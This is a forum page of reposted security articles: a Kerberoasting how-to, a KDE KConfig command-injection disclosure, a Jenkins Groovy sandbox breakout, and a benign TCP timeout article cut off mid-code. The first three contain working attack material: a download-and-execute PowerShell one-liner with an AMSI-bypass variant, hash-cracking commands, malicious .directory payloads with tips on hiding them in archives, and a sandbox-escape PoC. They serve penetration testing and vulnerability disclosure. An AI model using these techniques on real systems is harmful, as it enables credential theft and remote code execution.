Everything posted by Nytro
-
How to: Kerberoast like a boss
Neil Lines, 18 Sep 2019

Kerberoasting: by default, all standard domain users can request a copy of all service accounts along with their correlating password hashes. Crack these and you could have administrative privileges. But that's so 2014. Why write a blog post about this in 2019 then? It still works well, yet there are plenty of tips and tricks that can be useful to bypass restrictions that you come up against. That's what this post is about. The process required to perform Kerberoasting is trivial thanks to the original research by Tim Medin, but what more can we learn?

Everyone needs a lab

Having a lab is key to testing. If you want to attempt any of the exploitation detailed in this blog, I would recommend building your own virtual Windows domain using whichever virtualisation solution you prefer. You can download free 90-day Windows host VMs from the following link.

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

180-day trial ISOs of Windows Server 2008 R2, 2012 R2, 2016 and 2019 can be downloaded from the following links.

https://www.microsoft.com/en-gb/download/details.aspx?id=11093
https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-server-2012-r2

Not created a virtual domain before? It's easy, this post explains all.

https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/

Kerberoasting

In 2014 Tim Medin did a talk called Attacking Kerberos: Kicking the Guard Dog of Hades, where he detailed the attack he called 'Kerberoasting'. This post won't revisit the hows and whys of how Kerberoasting works, but it will detail a number of different techniques showing you how to perform the exploitation. It will also include the results from testing each method in my lab to help demonstrate. There's more on the theory behind Kerberoasting here.

http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

…you can also watch Tim's talk.

https://www.youtube.com/watch?v=HHJWfG9b0-E

Quick update

Kerberoasting results in you collecting a list of service accounts along with their correlating password hashes from a local domain controller (DC). You do need to reverse any collected hashes, but it's well worth attempting the process because service accounts are commonly part of the domain admins (DA), enterprise admins (EA) or local administrators group.

Blast in the past

A few years back, while PowerShell (PS) was ruling the threat landscape, it was the go-to method for remote red team or internal infrastructure testing. Back then you could simply fire up a PS session, copy and paste a PS one-liner and be well on the way to collecting an account which belongs to the DA group. Let's go back in time for a minute and review using a PS one-liner to perform Kerberoasting. We start off by opening PowerShell, then running a dir command to view the contents of our user's home directory. Then copy and paste the following one-liner into PS and run it by pressing enter.

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

What does this do? The above one-liner instructs PS to relaunch, but this time set the ExecutionPolicy to bypass. This enables untrusted scripts to be run.
The (New-Object System.Net.WebClient).DownloadString section is used to download the Invoke-Kerberoast.ps1 script from the defined location, followed by loading the script into memory. The final section, Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt, runs the Kerberoast request, followed by detailing how the results should be returned. In the above example they are set to match the hashcat password cracking tool's file format requirements, followed by the defined file name and type. In short order: it downloads the script, runs it all in RAM and outputs the results ready for you to crack using hashcat.

After running the one-liner, you should see no response. To review the results simply rerun the dir command to reveal the created file named 'kerb-Hash0.txt'. Manually open the directory then double click on the created file to open it in Notepad. If you're working remotely you can use the type command followed by the name of the .txt file you wish to view.

The following screenshot details an extract from the collection of two service accounts from my lab. While it looks confusing to start with, the word following the * character is the username of the service account, so in the case of this demo the collected service account usernames are user1 and DA1.

Personally, I'd review the domain groups for each collected service account; there is a time cost associated with the reversal process of attempting to crack the collected hashes. If an account will not assist you in privilege escalation, I wouldn't waste the time trying to reverse it.

Enumeration of user1 reveals it's a typical domain user.

net user /domain user1

Enumeration of the account titled DA1 reveals that it's part of the DA and EA groups, meaning it has unrestricted administrative access over all domain joined machines and users.

net user /domain da1

The Reversal

To reverse collected Kerberoasted hashes you can use hashcat; here's how to do that. The previous section titled 'Blast in the past' resulted in the collection of a service account with the username of 'DA1'. To start the reversal process you need to copy the complete hash, starting with the first section '$krb5tgs' all the way to the end, and then paste this into a file. You can add as many of the collected hashes as you like, but just make sure each one is on its own new line. The screenshot below shows an extract of the collected 'DA1' hash.

For this demo I'm using hashcat version 5.1.0. You can download a copy from the following location.

https://hashcat.net/hashcat/

I run hashcat locally on my laptop which uses Windows 10 as a base OS. Although the graphics card is below average for a similar laptop, it can still chug through a Kerberoasted hash using a good size dictionary in a short time. The hashcat command to reverse Kerberoasted hashes is as follows.

hashcat64.exe -m 13100 hash.txt wordlist.txt --outfile=outputfile.txt

This shows the command I ran to reverse the 'da1' hash.

hashcat64.exe -m 13100 "C:\Users\test\Documents\Kerb1.txt" C:\Users\test\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\test\Documents\CrackedKerb1.txt"

The above process took 44 seconds to recover the password. The screenshot shows the response from hashcat on completion. The 1/1 indicates that of the provided 1 hash, 1 was reversed. Finally, opening the file titled 'CrackedKerb1.txt' reveals the reversed password of 'Passw0rd!', which is always placed at the end of the hash.
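If you've cracked a batch of hashes in one go, it can be handy to pair each recovered password back up with its service account name rather than eyeballing the long hashes. A minimal Python sketch, assuming hashcat's default outfile format of hash:password and the filename used above (both illustrative, adjust to your own paths):

# pair_cracked.py - match cracked passwords back to service account names.
# Assumes hashcat's default outfile format: <original hash>:<password>
with open("CrackedKerb1.txt") as outfile:
    for line in outfile:
        line = line.strip()
        if not line:
            continue
        hash_part, _, password = line.rpartition(":")
        # In a $krb5tgs$ hash the username is the field following the
        # first '*' character, e.g. $krb5tgs$23$*DA1$HACKLAB.LOCAL$...
        try:
            username = hash_part.split("*")[1].split("$")[0]
        except IndexError:
            username = "<unknown>"
        print(f"{username}: {password}")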
To verify the account had administrative rights across my lab domain, I tried the account with an RDP session to my local DC.

It used to be fun

Windows 10 with its fancy Defender and Antimalware Scan Interface (AMSI) has mostly ruined PS one-liners for us, so how can we get around this? Well, if your targets are using Defender (which is still quite rare in the enterprise wild) you're in luck, as there are some very well documented bypasses for AMSI. Mohammed Danish published a post titled How to Bypass AMSI with an Unconventional PowerShell Cradle; you can read it here.

https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9

Quick version: the Net.WebClient function, which is commonly used in one-liners, has a signature in AMSI. By replacing it with the System.Net.WebRequest class, the one-liner runs because there is no signature for it. The following weaponises that AMSI bypass with the Kerberoast request.

$webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');
$resp=$webreq.GetResponse();
$respstream=$resp.GetResponseStream();
$reader=[System.IO.StreamReader]::new($respstream);
$content=$reader.ReadToEnd();
IEX($content);
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt

It doesn't use AMSI

This was a new one to me. While on a client site recently I tried the Kerberoast one-liner, but it was blocked by their AV. So I thought I would try the above AMSI bypass, which was also blocked. The problem was that their AV solution did not rely on Microsoft AMSI to signature potential threats; it had its own solution for verifying potentially malicious PS scripts. My initial thoughts were: what do I do now? Well, this is where Rubeus (a C# toolset for raw Kerberos interaction and abuses) comes out to play. So, while they block most forms of PS, do they block C#? The answer is not a lot do at present. You can read more about Rubeus here.

https://github.com/GhostPack/Rubeus

Rubeus comes uncompiled. Don't stress over this though, as it's not as hard to compile C# projects as it might seem. For this demonstration I used Microsoft's free Visual Studio, which I downloaded and installed into a Windows 10 VM.

https://visualstudio.microsoft.com/vs/community/

During the install process Visual Studio prompts you to select what you need. I ticked the following two.

Following the installation of Visual Studio, git clone the Rubeus project from https://github.com/GhostPack/Rubeus and then, to start the process, double click on the .sln file. BTW, an SLN file is a structure file used for organizing projects in Microsoft Visual Studio. Finally, to compile Rubeus click on the Start button. After running once, a compiled .exe should have been created in the Debug directory, which can be found under the Rubeus-master\Rubeus\ directories. This is the full directory location of the compiled .exe I created for this post.

C:\Users\IEUser\Desktop\Rubeus-master\Rubeus\bin\Debug

Following the compiling of Rubeus, you can run it to perform a Kerberoast with the following command.

Rubeus.exe kerberoast /format:hashcat > Hash1

The .exe should run unprompted, but I did notice an error in my Windows 10 VM which I downloaded from the developer.microsoft.com site. The error prompted me to install .NET Framework.
You shouldn't need to do this on a target machine, as you would typically find .NET already installed in production environments. Running it in my Windows 7 VM worked first time and resulted in the collection of both service accounts. These are the details from an extract of the 'DA1' account as collected using Rubeus.

While the command defines the output as a hashcat format, it requires a little tweaking to be used in hashcat. The following section demonstrates what's required to prepare the hash for the reversal process. Open the output file, highlight all of the hash that you wish to reverse, and copy and paste it into Notepad++. Then highlight the first blank space right up to the first line. Then open Find and select the Replace tab. Leave the 'Find what' defined as the space, add nothing to the 'Replace with' section, then click 'Replace All'. This should result in making the hash complete across one line, which is now ready for hashcat.

No more Windows!

What if you can't bypass the AV restrictions? How about using your own Kali Linux - any flavour will do. For this demo I'm using Impacket.

https://github.com/SecureAuthCorp/impacket

You can download it from GitHub by running the following:

git clone https://github.com/SecureAuthCorp/impacket.git

Before you can run the Kerberoast request you need to verify that you can ping the full internal Microsoft domain name from your Kali box. If you get no reply you need to add a static DNS entry. To do this use your editor of choice, and add a single entry for the full domain referencing the IP address of their DC.

gedit /etc/hosts

127.0.0.1 localhost
127.0.1.1 kali
192.168.1.200 server1.hacklab.local

Then try and ping the full domain name again. If you get a reply it's looking good.

ping server1.hacklab.local
PING server1.hacklab.local (192.168.1.200) 56(84) bytes of data.
64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=1 ttl=128 time=3.25 ms
64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=2 ttl=128 time=0.519 ms

To run the Kerberoast request from Impacket you need to move into the examples directory.

root@Kali:~# cd Desktop/
root@Kali:~/Desktop# cd impacket/
root@Kali:~/Desktop/impacket# cd examples/

…and finally the script you need to run is titled GetUserSPNs.py. The commands are as follows.

./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name

A nice addition to this is the inclusion of the -dc-ip Add-DC-IP-Address switch, which enables you to define which DC to point the request at. If all works as expected you'll be prompted for the user's password. After submitting that you should see the service accounts with their hashes.

Final Thoughts

Kerberoasting collects the service accounts along with their correlating password hashes. It is possible to reverse these hashes in a relatively short time if the password is based on a weakly defined word. Enterprises should review their own service accounts in Active Directory to verify whether they are actually necessary. The service accounts that are required should be set with a complex, non-dictionary based password.

Sursa: https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
-
The Year of Linux on the Desktop (CVE-2019-14744)
[ kde , code execution ]

0x01 Introduction

There's been a lot of controversy regarding the KDE KConfig vulnerability, along with the way I decided to disclose the issue (full disclosure). Some have even decided to write up blog posts analyzing this vulnerability, despite the extremely detailed proof-of-concept I provided. That's why in this post I'm going to detail how I found the vulnerability, what led me to finding it, and what my thought process was throughout the research.

Firstly, to summarize: KDE Frameworks (kf5/kdelibs) < 5.61.0 is vulnerable to a command injection vulnerability in the KConfig class. This can be directly exploited by having a remote user view a specially crafted configuration file. The only interaction required is viewing the file in a file browser and/or on the desktop. Sure, this requires a user downloading a file, however it's not hard to hide said file at all.

Exploit demo uploaded by Bleepingcomputer

0x02 Discovery

After I had finished publishing the last couple EA Origin vulnerabilities, I really wanted to get back on Linux and focus on vulnerabilities specific to Linux distributions. I figured that with Origin's client being written using the Qt framework, and the fact that KDE was also built using the Qt framework, I would maybe try and look into that. In turn, it led me to checking out KDE. Another factor that probably played a part in this whole process was that I had been using KDE on one of my laptops, and was familiar enough with it that I could map out attack surface fairly easily.

The first lightbulb moment

Most of the research I was doing at the time was shared with a good friend of mine who has helped me previously with other vulnerabilities. Thankfully this makes it easy for me to share the thought process with you folks. Because I was looking into KDE, I decided to first look at their default image viewer (gwenview). The idea behind this was: "if I can find a vulnerability in the default image viewer, that should be a fairly reliable exploit". Naturally, if we can host our payload in an image and trigger it when someone views it or opens it in their browser, it makes things really easy.

The first lightbulb moment came to me when I realized that gwenview actually compiles a list of recently viewed files, and uses the KConfig configuration syntax to set these entries. What stood out to me was the shell variables. Massive red flag. Depending on how these variables are being interpreted, we may be able to achieve command execution. Clearly in File1 it's calling $HOME/Pictures/kdelol.gif and resolving the variable, otherwise how would gwenview figure out where the file is? To see if these configuration entries were actually interpreting shell variables/commands, I added some of my own input in Name2.

After looking in gwenview… nothing different? Okay, that kind of sucks, so I went back to my configuration file to see if anything changed. Turns out, gwenview interprets the shell variables when it gets launched, so in order for those recent files to be interpreted, gwenview must be freshly launched after the configuration file has been updated. Once that happens, the command will execute. As you can see, the command in the Name2 entry got interpreted, and resolved the output of $(whoami). The reason why it reverted back to Name1 is because I duplicated entries with File.
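The screenshots of the config file aren't reproduced in this repost, so here's a rough reconstruction of the experiment as a Python sketch for your own lab. The config path, group and key names are assumptions drawn from the description above - inspect your own gwenviewrc before relying on them:

# Reconstruction of the gwenview recent-files experiment (lab use only).
# Path, group and key names are assumptions based on the write-up;
# check your own ~/.config/gwenviewrc to confirm them.
import os

config = os.path.expanduser("~/.config/gwenviewrc")

entry = (
    "[Recent Files]\n"
    "File1[$e]=$HOME/Pictures/kdelol.gif\n"
    "Name1[$e]=kdelol.gif\n"
    "File2[$e]=$HOME/Pictures/test.png\n"
    "Name2[$e]=$(whoami)\n"   # injected command substitution
)

with open(config, "a") as f:   # append so existing settings survive
    f.write("\n" + entry)

# Relaunch gwenview afterwards - per the write-up, the entries are only
# expanded when the application is freshly started.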
This doesn't make much difference for us at the moment; as long as our commands are executing, that should be enough for us to move forward. Initially, I had no idea what the $e was supposed to mean, so I did the necessary digging and found the documentation for KDE System Configuration files. Turns out the $e is there to tell KDE to allow shell expansions. At this point, it wasn't a vulnerability or a glaring issue at all. It definitely seemed dangerous though, and I was convinced more could be done to abuse it. After discovering KDE allows shell expansion in their config files, I sent a message to my buddy detailing what I had just learned. Here I presented the idea that maybe a content injection type payload would be possible via the filename. Unfortunately I tried this, and KDE seems to properly parse new entries and escape them by adding an additional $. Either way, if you were to send someone a file with said payload, that would obviously be suspicious. Kind of defeats the purpose. At this point I wasn't sure how to go about exploiting this issue. Surely there must be some way; this seems like a really bad idea. With that in mind, I got tired of trying the same thing over again and reading the same docs, so I took a break.

The second lightbulb moment

Eventually I came back to KDE and was browsing a directory where I needed to see hidden files (dotfiles). I went to Control > Show Hidden Files, and realized all of a sudden it created a .directory file in the current working directory. Okay, interesting. Being unsure of what this .directory file was, I looked at the contents.

[Dolphin]
Timestamp=2019,8,11,23,42,5
Version=4

[Settings]
HiddenFilesShown=true

The first thing I noticed was that it seemed to be consistent with the syntax that KDE uses for all of its configuration files. I instantly wondered if maybe those entries could be injected with a shell command, seeing as the .directory file was being read and processed by KConfig the moment the directory was opened. I tried injecting the Version entry with my shell command, but it kept getting over-written. Didn't seem like it was going to work. Now I was thinking: "Hm, maybe KDE has some existing .directory files that could tell me something". So I looked for them.

zero@pwn$ locate *.directory
/usr/share/desktop-directories/kf5-development-translation.directory
/usr/share/desktop-directories/kf5-development-webdevelopment.directory
/usr/share/desktop-directories/kf5-development.directory
/usr/share/desktop-directories/kf5-editors.directory
/usr/share/desktop-directories/kf5-edu-languages.directory
/usr/share/desktop-directories/kf5-edu-mathematics.directory
/usr/share/desktop-directories/kf5-edu-miscellaneous.directory
[...]

For an example, let's take kf5-development-translation.directory and look at the contents.

kf5-development-translation.directory:

[Desktop Entry]
Type=Directory
Name=Translation
Name[af]=Vertaling
[...]
Icon=applications-development-translation

I noticed that within the [Desktop Entry] tag, certain entries were being called that had keys. For example, the af key on the Name entry:

Name[af]=Vertaling

Seeing as KConfig is definitely checking entries for keys, let's try adding a key with the $e option like the config documentation mentioned. Another thing that really interested me at this point was the Icon entry. Here it gives you the option to set the icon of either the current directory, or the file itself. If the file is simply named .directory, it will set properties for the directory it's in.
If the file is named payload.directory, only the payload.directory file will have the icon, not the parent directory. Why does it work like this? We'll get into that in a second. This is really appealing, cuz this means our Icon entry can get called without even opening a file; it can get called simply by navigating to a certain directory. If injecting a command with the $e key works here… dang, that was a little too easy, wasn't it? Surely, you already know the outcome of this story when using the following payload:

payload.directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

0x03 Under the Hood

Like with any vulnerability, having access to the code can make our lives a lot easier. Having a full understanding of our "exploit" is essential in order to maximize impact and produce a good quality report. At this moment I had identified a few things:

The issue is actually a design flaw in KDE's configuration.
It can be triggered by simply viewing a file/folder.
The issue itself is clearly in KConfig; however, if we can't get the configuration entries called, there's no way of triggering it.

So there are a couple parts to this. With this information, I decided to browse the code for KConfig and KConfigGroup. Here, I found a function called readEntry().

kconfiggroup.cpp

We can see it's doing a few things:

Checks for a key in the entry.
If the expand ($e) key exists, runs expandString() on the value being read.

Obviously now we need to find out what expandString() is doing. Browsing around the docs we find the function in kconfig.cpp.

kconfig.cpp

TL;DR: Checks for $ characters. Checks to see if () follows. Runs popen on the value. Returns the value (had to cut off that part).

That pretty much explains most of how this works, however I wanted to follow the code and find exactly where readEntry(), then expandString(), was getting called and executing our command. After searching around for quite a while on GitHub, I determined that there was a function specific to desktop files, and that this function is called readIcon(), which is located in the KDesktopFile class.

kdesktopfile.cpp

Basically it just uses the readEntry() function and grabs the icon from the configuration file. Knowing this function exists… we can go back to our sources and search for readIcon(). I had only been messing with .directory files up until now, but after reading some more of the code, it turns out that this KDesktopFile class is used for more than just .directory files. It's used for .desktop files too (who would have thought??????? lol). Because KDE treats .directory and .desktop files as KDesktopFiles, and because the icon gets called from this class (or any other class, it doesn't even matter in this case), our command will execute if we inject our command there.

0x04 Exploitation

Finding ways to trigger readEntry

SMB share method

We know that if we can get someone to view a .directory or .desktop file, readEntry() gets called, and will thus execute our code. I figured there must be more ways to trigger readEntry. Ideally, fully remote, with less interaction, i.e. NOT downloading a file. The idea that came to mind to solve this was to use an smb:// URI in an iframe to serve a remote share that the user would connect to, ultimately having our .directory file executed the moment they connected. Very unfortunately, KDE is unlike GNOME in the sense that it does NOT automatically mount remote shares, and does NOT trust .desktop/.directory files if they don't already exist on the filesystem.
This essentially defeats the purpose of having a user accidentally browse a remote share and have arbitrary code executed. It's funny, because automounting remote shares has been a feature that KDE users have been asking for for a very long time. Had they implemented it, this attack could've been quite a bit more dangerous. Anyways, we can't automatically mount remote shares, but KDE does have a client that's meant to facilitate working with SMB shares, and it is apparently common among KDE users. This application is called SMB4K and doesn't actually ship with KDE. Once a share has been mounted using SMB4K, it can be accessed in Dolphin. If we have write access to a public SMB share (that people are browsing via SMB4K), we can plant a malicious config file that would appear as the following when viewed in Dolphin, ultimately achieving code execution remotely.

ZIP method (nested config)

Sending someone a .directory or .desktop file would obviously raise a lot of questions, right? I'd imagine so. That's what most of the commentary around this subject seems to suggest. Why doesn't that matter? Because nesting these files and forging their file extensions is the easiest thing you could possibly imagine. We have options here.

The first option is to create a nested directory, which will have its icon loaded as soon as the parent directory is opened. This executes the code without even seeing or knowing the contents of the directory. For example, look at this httpd download from the Apache website. There's no way that an unsuspecting user would be able to identify that there's a malicious .directory file nested in one of those directories. If you're expecting it, sure, but generally speaking, no suspicion would arise.

nested directory payload

$ mkdir httpd-2.4.39
$ cd httpd-2.4.39
$ mkdir test; cd test
$ vi .directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&)

ZIP the archive & send it off. The moment the httpd-2.4.39 folder is opened in the file manager, the test directory will attempt to load the icon, resulting in command execution.

ZIP method (lone config file)

The second option we have is to "fake" our file extensions. I actually forgot to document this method in the original proof-of-concept, but that's why I'm including it here now. As it turns out, when KDE doesn't recognize a file extension, it attempts to be "smart" and assign a mimetype. If the file contains [Desktop Entry] at the beginning, it's assigned the application/x-desktop mimetype, ultimately allowing the file to be processed by KConfig on load. Knowing this, we can make a fake TXT file with a character that closely resembles a "t". To demonstrate how easy hiding the file is, I've used the httpd package again. Obviously the icon gives it away, but still, it's much more discreet than having a random .desktop/.directory file. Again, as soon as this folder is opened, the code gets executed.

Drag & Drop method (lone config file)

Honestly this method is relatively useless, but I thought it would be cool in the demo, along with adding a potential social-engineering vector to the delivery of this payload. While I was picking apart KDE, I realized (accidentally) that you can actually drag and drop remote resources, and have a file transfer trigger. This is all enabled by KIO (the KDE input/output module). This basically allows users to drag and drop remote files and transfer them onto their local filesystem.
Essentially, if we can SE a user to drag and drop a link, the file transfer will trigger and ultimately execute the arbitrary code the moment the file is loaded onto the system.

0x05 Outro

Thanks to the KDE team, you no longer have to worry about this issue, as long as the necessary patches have been applied. Huge kudos to them for getting this issue patched within approximately 24 hours of being made aware. That's a very impressive response. I'd also like to give a big shoutout to the following friends of mine who were a huge help throughout the entire process. Check out the references for the weaponized payload Nux shared.

Nux
yuu

References

KDE 4/5 KDesktopfile (KConfig) Command Injection
KDE Project Security Advisory
KDE System Administration
KDE ARBITRARY CODE EXECUTION AUTOCLEAN by Nux

Sursa: https://zero.lol/2019-08-11-the-year-of-linux-on-the-desktop/
-
Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400)

Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security plugin in their Pipeline plugin for build scripts. We responsibly disclosed this vulnerability; it has been fixed in the current version of Jenkins and the corresponding Jenkins Security Advisory 2019-09-12 has been published. In this blog post I want to report a bit on the technical details of the vulnerability.

Description

The Groovy sandbox transforms some AST nodes of the script to add security checks. For example

ret = Runtime.getRuntime().exec("id")

will be transformed to something like

ret = Sandbox.call(Sandbox.call(Runtime.class, "getRuntime", []), "exec", ["id"])

Sandbox.call will check at runtime if the script can call the method with the given arguments. However, there were some cases in which the transformer did not transform child expressions, which then could do anything.

1.(untransformed)()
1.(untransformed) = 1
sometimesuntransformed++

In the first case the method name of a function call was not transformed. Who thought that a function name needs to be an identifier? The second case has the same problem, but for the name of a property expression as the left-hand side of an assignment. For the last case, the expression needs to not be of the form a++ or a.b++. And in a.(b)++, b is also not transformed. This allowed everyone who was able to supply build scripts to execute commands as the Jenkins master.

PoC

The script-security and pipeline plugins are required, but installed by default. A user with job/configure permission is needed to change the script code. The following pipeline script will run the id shell command and throw an error with its output.

@NonCPS
def e(){
    1.({throw new Error("id".execute().text)}())();
}
e();

@NonCPS is needed to disable a transformation step that would cause problems. The expected output of this script after a build is shown in the screenshot. As seen in the output, the command did run as Jenkins without approval of an administrator.

Disclosure Timeline

We responsibly disclosed this vulnerability and in the current version of Jenkins it has been fixed and the according Jenkins Security Advisory 2019-09-12 has been published. The disclosure timeline was as follows:

12.09.2019 – Public disclosure of vulnerability
10.09.2019 – Vulnerabilities were assigned CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400
06.09.2019 – Report

Conclusions

Sandboxing is hard, and a little oversight (that property names can be arbitrary expressions) can lead to escapes. I strongly recommend updating to the most current version if you use Jenkins, where this issue has been fixed, and of course ensuring proper patch and vulnerability management processes are in place in general.

Best, Nils

Sursa: https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/
-
When TCP sockets refuse to die
Marek Majkowski, September 20, 2019

While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out!

(Image by Sergiodc2, CC BY SA 3.0)

In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out a fairly modern TCP_USER_TIMEOUT socket option is equally as important. Furthermore it interacts with TCP keepalives in subtle ways. Many people are confused by this.

In this blog post, we'll try to show how these options work. We'll show how a TCP socket can time out during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and the ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections.

SYN-SENT

Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github.

$ sudo ./test-syn-sent.py
# all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0      1      host:2     host:1 timer:(on,940ms,0)
00:01.028 IP host.2 > host.1: Flags [S] # first retry
00:03.044 IP host.2 > host.1: Flags [S] # second retry
00:07.236 IP host.2 > host.1: Flags [S] # third retry
00:15.427 IP host.2 > host.1: Flags [S] # fourth retry
00:31.560 IP host.2 > host.1: Flags [S] # fifth retry
01:04.324 IP host.2 > host.1: Flags [S] # sixth retry
02:10.000 connect ETIMEDOUT

Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet. Since it didn't get any response, the OS will by default retry sending it 6 times. This can be tweaked by the sysctl:

$ sysctl net.ipv4.tcp_syn_retries
net.ipv4.tcp_syn_retries = 6

It's possible to overwrite this setting per-socket with the TCP_SYNCNT setsockopt:

setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6);

The retries are staggered at the 1s, 3s, 7s, 15s, 31s, 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000ms will cause the following interaction:

$ sudo ./test-syn-sent.py 5000
# all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0      1      host:2     host:1 timer:(on,996ms,0)
00:01.016 IP host.2 > host.1: Flags [S] # first retry
00:03.032 IP host.2 > host.1: Flags [S] # second retry
00:05.016 IP host.2 > host.1: Flags [S] # what is this?
00:05.024 IP host.2 > host.1: Flags [S] # what is this?
00:05.036 IP host.2 > host.1: Flags [S] # what is this?
00:05.044 IP host.2 > host.1: Flags [S] # what is this?
00:05.050 connect ETIMEDOUT

Even though we set user-timeout to 5s, we still saw the six SYN retries on the wire. This behaviour is probably a bug (as tested on a 5.2 kernel): we would expect only two retries to be sent - at the 1s and 3s marks - and the socket to expire at the 5s mark.
Instead we saw this, but we also saw a further 4 retransmitted SYN packets aligned to the 5s mark - which makes no sense. Anyhow, we learned a thing - the TCP_USER_TIMEOUT does affect the behaviour of connect().

SYN-RECV

SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether.

In SYN-RECV state, the socket will retry sending SYN+ACK 5 times as controlled by:

$ sysctl net.ipv4.tcp_synack_retries
net.ipv4.tcp_synack_retries = 5

Here is how it looks on the wire:

$ sudo ./test-syn-recv.py
00:00.000 IP host.2 > host.1: Flags [S]
# all subsequent packets dropped
00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0      0      host:1     host:2 timer:(on,996ms,0)
00:01.033 IP host.1 > host.2: Flags [S.] # first retry
00:03.045 IP host.1 > host.2: Flags [S.] # second retry
00:07.301 IP host.1 > host.2: Flags [S.] # third retry
00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry
00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry
01:04:610 SYN-RECV disappears

With default settings, the SYN+ACK is re-transmitted at the 1s, 3s, 7s, 15s, 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affect the lifetime of SYN-RECV sockets.

Final handshake ACK

After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to an ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0      0      host:1     host:2 timer:(on,1sec,0)
ESTAB    0      0      host:2     host:1
00:01.014 IP host.1 > host.2: Flags [S.]
00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0      0      host:1     host:2 timer:(on,1.012ms,1)
ESTAB    0      0      host:2     host:1

As you can see, SYN-RECV has the "on" timer, the same as in the example before. We might argue this final ACK doesn't really carry much weight. This thinking led to the development of the TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set the socket remains in SYN-RECV state until it receives the first packet with actual data:

$ sudo ./test-syn-ack.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV
State    Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0      0      host:1     host:2 timer:(on,7.192ms,0)
ESTAB    0      0      host:2     host:1
00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB
State    Recv-Q Send-Q Local:Port Peer:Port
ESTAB    11     0      host:1     host:2
ESTAB    0      0      host:2     host:1

The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK.
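If you want to reproduce the DEFER ACCEPT behaviour without the post's test scripts, the option is a one-liner on the listening socket. A minimal Python sketch (Linux only; the port is illustrative, and the 8-second value roughly mirrors the ~7s timer seen above):

# Minimal TCP_DEFER_ACCEPT demo (Linux only).
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
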